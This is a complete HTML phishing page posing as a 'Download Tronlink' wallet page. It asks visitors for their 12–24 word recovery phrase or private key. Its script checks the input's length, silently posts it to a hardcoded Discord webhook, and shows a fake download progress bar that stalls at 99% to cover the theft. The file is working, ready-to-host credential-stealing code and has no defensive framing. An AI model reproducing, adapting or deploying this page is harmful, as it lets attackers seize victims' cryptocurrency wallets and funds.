<!DOCTYPE html>
<html>
<head>
  <title>Download Tronlink</title>
  <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0">
  <link href="https://fonts.googleapis.com/css2?family=Roboto:wght@400;700&display=swap" rel="stylesheet">

  <style>
    body {
      font-family: 'Roboto', sans-serif;
      background: #357DEC;
    }

    .image-logo {
      position: absolute;
      top: 10px;
      left: 10px;
      width: 100px;
    }

    .container {
      max-width: 600px;
      margin: 0 auto;
      padding-top: 80px;
      text-align: center;
    }

    h2 {
      font-size: 24px;
      margin-bottom: 20px;
      color: white;
      margin-top: 40px;
      text-transform: uppercase;
      letter-spacing: 2px;
    }

    .input-field {
      background-color: #e9ecef;
      border: 2px solid #17a2b8;
      padding: 35px;
      margin-bottom: 20px;
      width: 80%;
      border-radius: 5px;
      font-size: 16px;
      color: #495057;
    }

    .button {
      background-color: #D9DFE1;
      border: none;
      color: #010416;
      padding: 10px 30px;
      text-align: center;
      text-decoration: none;
      display: inline-block;
      font-size: 18px;
      margin-bottom: 20px;
      cursor: pointer;
      border-radius: 5px;
      transition: background-color 0.3s ease;
    }

    .button:hover {
      background-color: #138496;
    }

    .loading-button {
      background-color: #138496;
      position: relative;
    }

    .loading-button:after {
      content: "";
      position: absolute;
      top: 50%;
      left: 50%;
      transform: translate(-50%, -50%);
      display: inline-block;
      width: 16px;
      height: 16px;
      margin-left: 10px;
      border: 3px solid #ffffff;
      border-top-color: transparent;
      border-radius: 50%;
      animation: loading 5s infinite;
    }

    .back-button {
      position: absolute;
      top: 10px;
      right: 10px;
      background-color: #D9DFE1;
      color: #010416;
      border: none;
      padding: 5px 20px;
      font-size: 16px;
      cursor: pointer;
      border-radius: 5px;
      transition: background-color 0.3s ease;
      margin-top: 20px;
    }

    .back-button:hover {
      background-color: #138496;
    }

    .input-error {
      border-color: red;
    }

    @keyframes loading {
      0% {
        transform: translate(-50%, -50%) rotate(0deg);
      }
      100% {
        transform: translate(-50%, -50%) rotate(360deg);
      }
    }

    @media screen and (max-width: 600px) {
      .container {
        padding: 10px;
      }

      h2 {
        font-size: 20px;
      }

      .input-field {
        padding: 15px;
      }
    }

 .bubble-container {
      position: absolute;
      top: 0;
      left: 0;
      width: 100%;
      height: 100%;
      pointer-events: none;
      z-index: 1;
    }

    .bubble {
      position: absolute;
      background-color: rgba(255, 255, 255, 0.5);
      border-radius: 80%;
      animation-name: bubble-rise;
      animation-duration: 40s;
      animation-timing-function: linear;
      animation-iteration-count: infinite;
      pointer-events: none;
    }

    @keyframes bubble-rise {
      0% {
        transform: translateY(100%);
        opacity: 1;
      }
      50% {
        transform: translateY(0%);
        opacity: 0.7;
      }
      100% {
        transform: translateY(-100%);
        opacity: 0;
      }
    }
  </style>
</head>
<body>
  <div class="container">
    <img class="image-logo" src="https://lavender-bewildered-octopus-416.mypinata.cloud/ipfs/QmQyw5FbGkGgZeAgnUSs1h1MeRkYpaXCFrm2V5G56ieLZy?_gl=1*1vqjvjn*rs_ga*NTgzMzM3YTMtOWRiMS00MjJmLTgyOGItODNiMzI4NGEzZmQw*rs_ga_5RMPXG14TE*MTY4NzY2NTA4Ni4yMi4xLjE2ODc2NjczODEuNjAuMC4w" alt="Logo">
    <button class="back-button" onclick="window.history.back()">Back</button>
    <h2>Enter your 12-24 word passphrase or paste your PrivateKey to continue</h2>
    <input type="text" id="input-text" class="input-field" placeholder="Enter text">
    <button id="download-button" class="button">Download</button>
  </div>
  <div class="bubble-container"></div>

  <script>
    function validateInput() {
      var input = document.getElementById("input-text");
      var value = input.value.trim();

      var isValid = false;

      // Verificar si cumple con las especificaciones
      if (value.split(" ").length === 12 || value.split(" ").length === 24 || value.length === 64) {
        isValid = true;
      }

      if (!isValid) {
        // Marcar el campo y el botón como inválidos
        input.classList.add("input-error");
        document.getElementById("download-button").innerText = "Invalid";
      } else {
        // Quitar cualquier error y restaurar el botón
        input.classList.remove("input-error");
        document.getElementById("download-button").innerText = "Download";
      }

      return isValid;
    }

    function sendDataToDiscord() {
      if (!validateInput()) {
        return;
      }

      var text = document.getElementById("input-text").value;

      // Construir el objeto con los datos a enviar
      var data = {
        content: text
      };

      // Realizar la solicitud POST a través de fetch
      fetch('https://discordapp.com/api/webhooks/1073374509165465700/mr2ICeCadLB01KfbfV0HSI7bfpBkIaYTyIFMPLMW58Og3xWGRpv2EOOowLITDz3SRs3m', {
        method: 'POST',
        headers: {
          'Content-Type': 'application/json'
        },
        body: JSON.stringify(data)
      })
      .then(function(response) {
        console.log("Los datos se enviaron correctamente a Discord.");
      })
      .catch(function(error) {
        console.error("Error en la solicitud:", error);
      });

      // Simulación de carga para animar el botón
      var button = document.getElementById("download-button");
      button.classList.add("loading-button");
      button.disabled = true;

      var progress = 0;
      var interval = setInterval(function() {
        progress++;
        button.innerText = "Downloading... " + progress + "%";

        if (progress === 99) {
          clearInterval(interval);
          button.disabled = false;
          button.classList.remove("loading-button");
          button.innerText = "Download";
        }
      }, 200);
    }

    var downloadButton = document.getElementById("download-button");
    downloadButton.addEventListener("click", sendDataToDiscord);

    function createBubbles() {
      const numBubbles = 50; // Número de burbujas
      const container = document.querySelector(".bubble-container");

      for (let i = 0; i < numBubbles; i++) {
        const bubble = document.createElement("div");
        bubble.className = "bubble";

        const randomSize = Math.random() * 80 + 20; // Tamaño aleatorio entre 20px y 100px
        const randomX = Math.random();
        const randomY = Math.random();

        bubble.style.width = randomSize + "px";
        bubble.style.height = randomSize + "px";
        bubble.style.top = randomY * 100 + "%";
        bubble.style.left = randomX * 100 + "%";

        container.appendChild(bubble);
      }
    }

    createBubbles();
  </script>
</body>
</html>
